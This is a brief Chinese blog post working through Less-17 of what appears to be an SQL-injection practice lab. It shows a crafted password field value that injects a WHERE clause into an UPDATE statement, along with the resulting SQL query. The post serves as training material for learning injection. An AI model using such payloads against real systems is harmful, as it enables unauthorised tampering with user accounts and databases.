Ricky Hao

Less-17 Update Query

因为是UPDATE语句,所以最好还是把剩下的WHERE username=’admin’补上,不然可能所有人密码都变了。
所以可以构造的语句是:

uname=admin&passwd=211' WHERE username='admin' and 1=2#&submit=Submit

对应的SQL语句为

UPDATE users SET password = '211' WHERE username='admin' and 1=2#' WHERE username='admin'
点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据